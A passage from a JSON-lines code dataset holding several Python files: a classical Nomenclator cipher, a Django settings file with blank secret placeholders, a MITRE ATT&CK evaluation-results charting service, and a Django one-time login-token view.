pos,gr in enumerate(X):\n X[pos] = D[gr+\" \"]\n\n # Mainly for debugging but also illustrative if you want to see how a\n # given text translates directly into code groups.\n if showgroups == True:\n return X\n\n while \">\" in X:\n pos = X.index(\">\")\n X[pos:pos+2] = \"\"\n\n while \"_\" in X:\n pos = X.index(\"_\")\n X[pos] = \"\"\n\n \n return \"\".join(X)\n\n\ndef nomenclatorExample():\n \n from Ciphers.UtilityFunctions import preptext\n\n print(\"Example of the Nomenclator Cipher\")\n\n textfile = open('C:\\\\Users\\\\Alexander\\\\Documents\\\\GitHub\\\\ClassicCrypto\\\\SampleText\\\\Text2.txt','r')\n ptext = preptext(textfile.readline(),silent=True)\n ptext = ptext[:200]\n \n #KEY = random.getrandbits(32)\n KEY = 3664080377\n \n ctext = nomenclator(ptext,KEY)\n dtext = nomenclator(ctext,KEY,decode=True)\n \n print(\"Plaintext 
\ndef nomenclator(text,key=1,decode=False,usenulls=True,dictionary=False,showgroups=False):\n    \n    D = createCodeGroups(key,decode)\n    if dictionary == True:\n        return D\n\n    \n    if decode == False:\n        codegroups = [\"{0:03} \".format(i) for i in range(1000)]\n        \n        if usenulls == True:\n\n            numNulls = len(text)//25\n\n            ## Insert nulls to break up words\n            for i in range(numNulls):\n                r = random.randint(0,len(text))\n                text = text[:r] + '_' + text[r:]\n            \n            for i in range(numNulls//3):\n                r = random.randint(0,len(text))\n                text = text[:r] + '>' + text[r:]\n            \n            # Replace the nulls\n            while \"_\" in text:\n                text = text.replace(\"_\",D[\"_\"][np.random.randint(0,63)],1)\n            \n            while \">\" in text:\n                gr = random.choice(codegroups)\n                text = text.replace(\">\",D[\">\"][np.random.randint(0,30)]+gr,1)\n        \n        # Starting with the longest ngrams, replace each letter group with one\n        # of the code groups assigned to it, chosen at random.\n        for size in [4,3,2,1]:\n            for T in [i for i in D.keys() if len(i) == size]:\n                ops = len(D[T])\n                while T in text:\n                    text = text.replace(T,D[T][np.random.randint(0,ops)],1)\n        \n        \n        return text\n    \n    if decode == True:\n        X = text.split(\" \")\n        # Drop the empty string left by the trailing space\n        X.pop()\n\n        for pos,gr in enumerate(X):\n            X[pos] = D[gr+\" \"]\n\n        # Mainly for debugging but also illustrative if you want to see how a\n        # given text translates directly into code groups.\n        if showgroups == True:\n            return X\n\n        # Remove each supernull together with the code group that follows it,\n        # then remove the ordinary nulls.\n        while \">\" in X:\n            pos = X.index(\">\")\n            del X[pos:pos+2]\n\n        while \"_\" in X:\n            pos = X.index(\"_\")\n            del X[pos]\n\n        \n        return \"\".join(X)\n
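\n# A minimal usage sketch (it assumes the NGram CSV files referenced above are\n# in place; the ciphertext differs between runs because homophones and nulls\n# are chosen at random, but decoding is deterministic for a given key):\n#\n#     ct = nomenclator('MEETMEATDAWN', key=1)\n#     pt = nomenclator(ct, key=1, decode=True)\n#     assert pt == 'MEETMEATDAWN'\n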
\ndef nomenclatorExample():\n    \n    from Ciphers.UtilityFunctions import preptext\n\n    print(\"Example of the Nomenclator Cipher\")\n\n    textfile = open('C:\\\\Users\\\\Alexander\\\\Documents\\\\GitHub\\\\ClassicCrypto\\\\SampleText\\\\Text2.txt','r')\n    ptext = preptext(textfile.readline(),silent=True)\n    ptext = ptext[:200]\n    \n    #KEY = random.getrandbits(32)\n    KEY = 3664080377\n    \n    ctext = nomenclator(ptext,KEY)\n    dtext = nomenclator(ctext,KEY,decode=True)\n    \n    print(\"Plaintext is:\\n{}\\n\\n\".format(ptext))\n    print(\"Ciphertext is:\\n{}\".format(ctext))\n\n    print(\"\\n\\nDoes the Text Decode Correctly?\",dtext == ptext)\n\ndef PrintCodes(n,decode=False):\n    \n    D = createCodeGroups(n,decode=decode)\n    \n    if decode == False:\n        for i,j in sorted(D.items()):\n            if i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\" and len(i) == 1:\n                S = i + \": \"\n                for ctr,grp in enumerate(j,1):\n                    S += grp\n                    if ctr % 7 == 0 and grp != j[-1]:\n                        S += \"\\n   \"\n                yield S\n        \n        for L in [2,3,4]:\n            for i,j in sorted(D.items()):\n                if len(i) == L:\n                    S = i + \": \"\n                    for ctr,grp in enumerate(j,1):\n                        S += grp\n                        if ctr % 7 == 0 and grp != j[-1]:\n                            S += \"\\n   \" + \" \"*(L-1)\n                    yield S\n        \n        # Compare against the last group of the list actually being printed,\n        # not the leftover loop variable j from the loops above.\n        S = \"_: \"\n        for ctr,grp in enumerate(D[\"_\"],1):\n            S += grp\n            if ctr % 7 == 0 and grp != D[\"_\"][-1]:\n                S += \"\\n   \"\n        yield S\n        \n        S = \">: \"\n        for ctr,grp in enumerate(D[\">\"],1):\n            S += grp\n            if ctr % 7 == 0 and grp != D[\">\"][-1]:\n                S += \"\\n   \"\n        yield S\n    \n    if decode == True:\n        ctr = 0\n        S = \"\"\n        for i,j in sorted(D.items()):\n            if ctr % 3 == 0 and ctr != 0: \n                yield S\n                S = \"\"\n            S += \"{}{:<4} \".format(i,j)\n            ctr += 1\n        # Yield the final partial row as well\n        if S != \"\":\n            yield S\n\n#nomenclatorExample()\n#for i in PrintCodes(1,decode=True):\n#    print(i)\n","repo_name":"SymmetricChaos/ClassicCrypto","sub_path":"Ciphers/Nomenclator.py","file_name":"Nomenclator.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"}
+{"seq_id":"12406694541","text":"# Check this into the repo now\n\n#: Google Analytics tracking code\nGA_CODE = 'UA-19123154-19'\n#: Typekit font code, from the embed URL: http://use.typekit.com/(code).js\nTYPEKIT_CODE = 'wxg4owb'\n#: Timezone for displayed datetimes\nTIMEZONE = 'Asia/Calcutta'\n#: Site id for networkbar\nSITE_ID = 'events'\n#: LastUser server\nLASTUSER_SERVER = 'https://auth.hasgeek.com/'\n#: LastUser client id\n#: DO NOT FILL IN THIS VALUE! THIS FILE IS CHECKED INTO GIT\n#: Put the value in development.py or production.py instead\nLASTUSER_CLIENT_ID = ''\n#: LastUser client secret\n#: DO NOT FILL IN THIS VALUE! THIS FILE IS CHECKED INTO GIT\n#: Put the value in development.py or production.py instead\nLASTUSER_CLIENT_SECRET = ''\n","repo_name":"hasgeek/fifthelephant","sub_path":"instance/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"}
+{"seq_id":"7526380951","text":"import copy\nimport os\nimport ntpath\nfrom pandas import json_normalize\nfrom app.utility.base_svc import BaseService\n\n\nclass DataService(BaseService):\n    adversary_path = os.path.abspath('data/evaluations/')\n    procedures_path = os.path.abspath('data/procedures/')\n    apt29_categories = ['None', 'Telemetry', 'MSSP', 'General', 'Tactic', 'Technique', 'N/A']\n    # A list rather than a set, so that iteration order (and therefore chart\n    # column order) is stable across runs.\n    apt29_modifiers = [\"None\", \"Alert\", \"Correlated\", \"Delayed (Manual)\", \"Delayed (Processing)\", \"Host Interrogation\",\n                       \"Residual Artifact\",\n                       \"Configuration Change (Detections)\",\n                       \"Configuration Change (UX)\", \"Innovative\"]\n\n    mod_organized = {'datasets': {\"None\": [], \"Alert\": [], \"Correlated\": [],\n                                  \"Delayed (Manual)\": [], \"Delayed (Processing)\": [], \"Host Interrogation\": [],\n                                  \"Residual Artifact\": [], \"Configuration Change (Detections)\": [],\n                                  \"Configuration Change (UX)\": [], \"Innovative\": []}, 'labels': []}\n    organized = {'datasets': {'None': [], 'Telemetry': [], 'General': [], 'Tactic': [], 'Technique': [], 'MSSP': [], 'N/A': []},\n                 'labels': []}\n\n    def __init__(self):\n        self.log = self.add_service('data_svc', self)\n        self.schema = dict(procedures=[], evaluations={})\n        self.ram = copy.deepcopy(self.schema)\n\n    async def load_evaluations(self):\n        evaluations = await self.get_service('file_svc').get_json_files(self.adversary_path)\n        for evaluation in evaluations:\n            results = await self.get_service('file_svc').load_json_file(evaluation)\n            name = ntpath.basename(evaluation).rstrip('.json')\n            data = await self.analyze_evaluations(results, name)\n            self.ram['evaluations'].update({name: {'data': data, 'results': results}})\n\n    async def load_procedures(self):\n        procedures = await self.get_service('file_svc').get_json_files(self.procedures_path)\n        for procedure in procedures:\n            data = await self.get_service('file_svc').load_json_file(procedure)\n            name = ntpath.basename(procedure)\n            self.ram['procedures'].append({name: data})\n\n    async def get_procedures(self):\n        return self.ram.get('procedures')\n\n    async def get_evaluations(self, criteria):\n        evaluations = list(self.ram['evaluations'].keys())\n        evaluations = [(eval_id, eval_id.split('.')[0]) for eval_id in evaluations if criteria['round'] in eval_id]\n        return sorted(evaluations)\n\n    async def analyze_evaluations(self, results, eval_name):\n        detections = 'DetectionCategories' if 'apt3' in eval_name else 'Detections'\n        tmp = json_normalize(data=results['Techniques'],\n                             record_path=['Steps', detections],\n                             meta=['TechniqueId', 'TechniqueName', 'Tactics', ['Steps', 'SubStep']])\n\n        tmp['Tactic'] = tmp.apply(lambda r: r.Tactics[0]['TacticName'], axis=1)\n        mod_df = tmp.explode('Modifiers')\n        mod_df['Step'] = mod_df.apply(lambda row: row['Steps.SubStep'].split('.', 1)[0], axis=1)\n        modifier_detections = mod_df.groupby(['DetectionType', 'Modifiers']).size().to_dict()\n        data = dict(modifier_detections=await self.consolidate(modifier_detections))\n        data['technique'] = await self.consolidate(mod_df.groupby(['TechniqueName', 'DetectionType']).size().to_dict())\n        data['total'] = tmp.groupby('DetectionType').count()['DetectionNote'].to_dict()\n        data['technique_mod'] = await self.consolidate(mod_df.groupby(['TechniqueName', 'Modifiers']).size().to_dict())\n        data['substep'] = await self.consolidate(mod_df.groupby(['Steps.SubStep', 'DetectionType']).size().to_dict())\n        data['step'] = await self.consolidate(mod_df.groupby(['Step', 'DetectionType']).size().to_dict())\n        data['tactic'] = await self.consolidate(mod_df.groupby(['Tactic', 'DetectionType']).size().to_dict())\n        data['tactic_steps'] = await self.consolidate(mod_df.groupby(['Tactic', 'Step', 'DetectionType']).size().to_dict())\n        data['step_modifiers'] = await self.consolidate(\n            mod_df.groupby(['Step', 'Modifiers']).size().to_dict())\n        return data\n
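\n    # A toy illustration of the json_normalize call above. The input shape is\n    # assumed from the ATT&CK evaluation JSON, cut down to a single detection:\n    #\n    #     doc = [{'TechniqueId': 'T1086', 'TechniqueName': 'PowerShell',\n    #             'Tactics': [{'TacticName': 'Execution'}],\n    #             'Steps': [{'SubStep': '1.A.1',\n    #                        'Detections': [{'DetectionType': 'Telemetry',\n    #                                        'DetectionNote': 'toy', 'Modifiers': []}]}]}]\n    #     json_normalize(data=doc, record_path=['Steps', 'Detections'],\n    #                    meta=['TechniqueId', 'TechniqueName', 'Tactics', ['Steps', 'SubStep']])\n    #\n    # This yields one row per detection with the technique, tactic and substep\n    # columns carried along, which is what the groupby calls rely on.\n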
\n    async def get_data(self, criteria):\n        eval_name = criteria['eval']\n        if 'category' in criteria.keys():\n            return self.ram['evaluations'][eval_name]['data'][criteria['data']][criteria['category']]\n        else:\n            return self.ram['evaluations'][eval_name]['data'][criteria['data']]\n\n    @staticmethod\n    async def consolidate(expanded_data):\n        # Turn a dict keyed by tuples (from a pandas groupby) into a nested\n        # dict keyed by the first tuple element.\n        data = {}\n        for tp, val in expanded_data.items():\n            if tp[0] in data.keys():\n                data[tp[0]].update({tp[1]: val})\n            else:\n                data.update({tp[0]: {tp[1]: val}})\n        return data\n
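\n    # Sketch of what consolidate does, on a made-up groupby result:\n    #\n    #     {('1.A.1', 'Telemetry'): 2, ('1.A.1', 'General'): 1, ('1.A.2', 'None'): 3}\n    #\n    # becomes\n    #\n    #     {'1.A.1': {'Telemetry': 2, 'General': 1}, '1.A.2': {'None': 3}}\n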
\n    async def step_data(self, criteria):\n        eval_name = criteria['eval']\n        data = self.ram['evaluations'][eval_name]['data'][criteria['data']]\n        tmp_org = copy.deepcopy(self.organized)\n        for key in range(1, 21):\n            key = str(key)\n            tmp_org['labels'].append(key)\n            for cat in self.apt29_categories:\n                if cat not in data[key].keys():\n                    tmp_org['datasets'][cat].append(0)\n                else:\n                    tmp_org['datasets'][cat].append(data[key][cat])\n        return tmp_org\n\n    async def substep_data(self, criteria):\n        eval_name = criteria['eval']\n        data = self.ram['evaluations'][eval_name]['data'][criteria['data']]\n        tmp_org = copy.deepcopy(self.organized)\n        tmp = sorted(data.items(), key=lambda k: int(k[0].split('.')[0]))\n        for key in tmp:\n            tmp_org['labels'].append(key[0])\n            for cat in self.apt29_categories:\n                if cat not in data[key[0]].keys():\n                    tmp_org['datasets'][cat].append(0)\n                else:\n                    tmp_org['datasets'][cat].append(data[key[0]][cat])\n        return tmp_org\n\n    async def modifier_data(self, criteria):\n        eval_name = criteria['eval']\n        data = self.ram['evaluations'][eval_name]['data'][criteria['data']]\n        tmp_org = copy.deepcopy(self.organized)\n        del tmp_org['datasets']['N/A']\n        apt29_cat = copy.deepcopy(self.apt29_categories)\n        for key in apt29_cat[:6]:\n            if key in data.keys():\n                for mod in self.apt29_modifiers:\n                    if mod not in data[key].keys():\n                        tmp_org['datasets'][key].append(0)\n                    else:\n                        tmp_org['datasets'][key].append(data[key][mod])\n            else:\n                for mod in self.apt29_modifiers:\n                    tmp_org['datasets'][key].append(0)\n        return tmp_org\n\n    async def tactic_data(self, criteria):\n        eval_name = criteria['eval']\n        data = self.ram['evaluations'][eval_name]['data'][criteria['data']]\n        return data\n","repo_name":"mitre-attack/joystick","sub_path":"app/service/data_svc.py","file_name":"data_svc.py","file_ext":"py","file_size_in_byte":7061,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"19"}
+{"seq_id":"37092429281","text":"import json\n\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect, HttpResponseNotFound\nfrom django.shortcuts import get_object_or_404, resolve_url\nfrom django.utils.http import is_safe_url\nfrom django.views.generic import View\n\nfrom django.contrib.auth import authenticate, login\n\nfrom .models import LOT\n\n\nclass LOTLogin(View):\n    def get(self, request, uuid):\n        lot = get_object_or_404(LOT, uuid=uuid)\n        if not lot.verify():\n            lot.delete()\n            return HttpResponseNotFound()\n\n        user = authenticate(lot_uuid=uuid)\n        if user is None:\n            # No authentication backend accepted the LOT; treat it like an\n            # unknown token rather than crashing in login().\n            return HttpResponseNotFound()\n        login(request, user)\n\n        try:\n            session_data = json.loads(lot.session_data)\n            request.session.update(session_data)\n        except Exception:\n            # If the stored session data is not valid JSON, skip restoring it\n            pass\n\n        if lot.is_one_time():\n            lot.delete()\n\n        redirect_to = request.GET.get('next')\n        if lot.next_url:\n            redirect_to = resolve_url(lot.next_url)\n\n        if not is_safe_url(url=redirect_to, host=request.get_host()):\n            redirect_to = resolve_url(settings.LOGIN_REDIRECT_URL)\n\n        return HttpResponseRedirect(redirect_to)\n","repo_name":"jespino/django-lot","sub_path":"lot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"}